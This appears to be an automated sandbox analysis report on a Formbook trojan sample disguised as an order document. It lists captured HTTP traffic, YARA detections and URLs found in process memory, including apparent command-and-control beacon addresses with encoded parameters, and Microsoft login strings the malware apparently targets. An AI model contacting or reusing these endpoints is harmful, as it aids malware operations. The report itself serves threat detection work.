            link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
            x-tec-api-version: v1
            x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
            x-tec-api-origin: https://superunicornpalace.com
            transfer-encoding: chunked
            content-encoding: gzip
            vary: Accept-Encoding
            date: Wed, 03 Jul 2024 15:52:56 GMT
            server: LiteSpeed
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            expires: Wed, 11 Jan 1984 05:00:00 GMT
            cache-control: no-cache, must-revalidate, max-age=0
            content-type: text/html; charset=UTF-8
            link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
            x-tec-api-version: v1
            x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
            x-tec-api-origin: https://superunicornpalace.com
            transfer-encoding: chunked
            content-encoding: gzip
            vary: Accept-Encoding
            date: Wed, 03 Jul 2024 15:52:58 GMT
            server: LiteSpeed
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            expires: Wed, 11 Jan 1984 05:00:00 GMT
            cache-control: no-cache, must-revalidate, max-age=0
            content-type: text/html; charset=UTF-8
            link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
            x-tec-api-version: v1
            x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
            x-tec-api-origin: https://superunicornpalace.com
            transfer-encoding: chunked
            content-encoding: gzip
            vary: Accept-Encoding
            date: Wed, 03 Jul 2024 15:53:01 GMT
            server: LiteSpeed
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Wed, 03 Jul 2024 15:54:50 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT
            ETag: W/"afe-6098b1f8c138d"
            Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 03 Jul 2024 15:54:53 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT | ETag: W/"afe-6098b1f8c138d" | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 03 Jul 2024 15:54:55 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT | ETag: W/"afe-6098b1f8c138d" | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 03 Jul 2024 15:54:58 GMT | Content-Type: text/html | Content-Length: 2814 | Connection: close | Vary: Accept-Encoding | Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT | ETag: "afe-6098b1f8c138d"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 03 Jul 2024 15:53:26 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://3cubesinterior.in/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade | Vary: Accept-Encoding | Content-Encoding: gzip | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 03 Jul 2024 15:53:29 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://3cubesinterior.in/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade | Vary: Accept-Encoding | Content-Encoding: gzip | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 03 Jul 2024 15:53:44 GMT | Content-Type: text/html; charset=UTF-8 | Server: ghs | Content-Length: 1566 | X-XSS-Protection: 0 | X-Frame-Options: SAMEORIGIN | Connection: close
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 03 Jul 2024 15:53:46 GMT | Content-Type: text/html; charset=UTF-8 | Server: ghs | Content-Length: 1566 | X-XSS-Protection: 0 | X-Frame-Options: SAMEORIGIN | Connection: close
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 03 Jul 2024 15:53:49 GMT | Content-Type: text/html; charset=UTF-8 | Server: ghs | Content-Length: 1566 | X-XSS-Protection: 0 | X-Frame-Options: SAMEORIGIN | Connection: close
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 03 Jul 2024 15:53:51 GMT | Content-Type: text/html; charset=UTF-8 | Server: ghs | Content-Length: 1727 | X-XSS-Protection: 0 | X-Frame-Options: SAMEORIGIN | Connection: close
            Source: compact.exe, 0000000C.00000002.4563338371.0000000005138000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000004028000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://3cubesinterior.in/n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXe
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004AF0000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.00000000039E0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD
            Source: compact.exe, 0000000C.00000002.4563338371.000000000463A000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.000000000352A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://epicbazaarhub.com/2769/?7Dihs8p=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4Y
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2115615694.0000000002A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://searchdiscovered.com/__media__/images/logo.gif)
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://superunicornpalace.com/mwa4/?Bp=2LpD8tLh&7Dihs8p=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP35
            Source: OFEkXEMCZC.exe, 0000000E.00000002.4564754025.0000000005149000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hondamechanic.today
            Source: OFEkXEMCZC.exe, 0000000E.00000002.4564754025.0000000005149000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hondamechanic.today/pv57/
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengistiebethlehem.com/Christmas_City_Studio.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe
            Source: compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengistiebethlehem.com/Lehigh_Valley.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2F
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengistiebethlehem.com/Moravia.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2FFitbFc
            Source: compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengistiebethlehem.com/display.cfm
            Source: compact.exe, 0000000C.00000002.4563338371.00000000044A8000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003398000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://yg08.gowi0i.xyz
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004C82000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
            Source: compact.exe, 0000000C.00000002.4556356627.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: compact.exe, 0000000C.00000002.4556356627.000000000311F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: compact.exe, 0000000C.00000003.2706758927.0000000008283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: compact.exe, 0000000C.00000002.4556356627.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: compact.exe, 0000000C.00000002.4556356627.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033I81
            Source: compact.exe, 0000000C.00000002.4556356627.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: compact.exe, 0000000C.00000002.4556356627.000000000311F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://support.hostgator.com/
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: firefox.exe, 0000000F.00000002.2818794642.0000000026FA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.fondazionegtech.org/jmiz/?7Dihs8p=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKK
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004C82000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=easybackpage.net
            Source: OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3

            E-Banking Fraud

            Source: Yara match File source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.spec 4008670601 AZTEK Order.exe.6eb0000.4.raw.unpack, -Module-.cs Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: 0.2.spec 4008670601 AZTEK Order.exe.288c328.0.raw.unpack, -Module-.cs Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: initial sample Static PE information: Filename: spec 4008670601 AZTEK Order.exe
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AEA806_2_017AEA80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BAD006_2_017BAD00
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AADE06_2_017AADE0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184CD1F6_2_0184CD1F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C8DBF6_2_017C8DBF
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01850CB56_2_01850CB5
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0C006_2_017B0C00
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A0CF26_2_017A0CF2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182EFA06_2_0182EFA0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D0F306_2_017D0F30
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017F2F286_2_017F2F28
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BCFE06_2_017BCFE0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A2FC86_2_017A2FC8
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01852F306_2_01852F30
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01824F406_2_01824F40
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186CE936_2_0186CE93
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0E596_2_017B0E59
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186EEDB6_2_0186EEDB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186EE266_2_0186EE26
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C2E906_2_017C2E90
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179F1726_2_0179F172
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E516C6_2_017E516C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017BB1B06_2_017BB1B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0187B16B6_2_0187B16B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0185F0CC6_2_0185F0CC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186F0E06_2_0186F0E0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018670E96_2_018670E9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B70C06_2_017B70C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179D34C6_2_0179D34C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186132D6_2_0186132D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017F739A6_2_017F739A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018512ED6_2_018512ED
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CB2C06_2_017CB2C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B52A06_2_017B52A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184D5B06_2_0184D5B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018675716_2_01867571
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A14606_2_017A1460
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186F43F6_2_0186F43F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186F7B06_2_0186F7B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018616CC6_2_018616CC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017F56306_2_017F5630
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B99506_2_017B9950
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CB9506_2_017CB950
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018459106_2_01845910
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181D8006_2_0181D800
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B38E06_2_017B38E0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01825BF06_2_01825BF0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017EDBF96_2_017EDBF9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186FB766_2_0186FB76
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CFB806_2_017CFB80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01851AA36_2_01851AA3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184DAAC6_2_0184DAAC
